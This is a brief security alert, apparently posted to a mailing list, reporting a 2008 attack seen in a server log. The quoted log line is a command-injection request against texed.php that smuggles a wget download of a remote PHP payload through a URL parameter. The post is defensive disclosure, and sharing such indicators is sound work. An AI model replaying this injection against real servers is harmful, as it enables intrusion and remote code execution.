Exploit in the wild: We saw this come across: 216.205.95.178 - - [12/Dec/2008:15:03:13 -0500] "GET /filter/tex/texed.php?formdata=foo&pathname=foo\";wget -O perso.wanadoo.es/medline/z1.php;echo+\" HTTP/1.1" 404 218 The host perso.wanadoo.es is still host the payload as of [15/Dec/2008:00:14:00 -0500]. Chris Lent Tel: +1.212.353.4350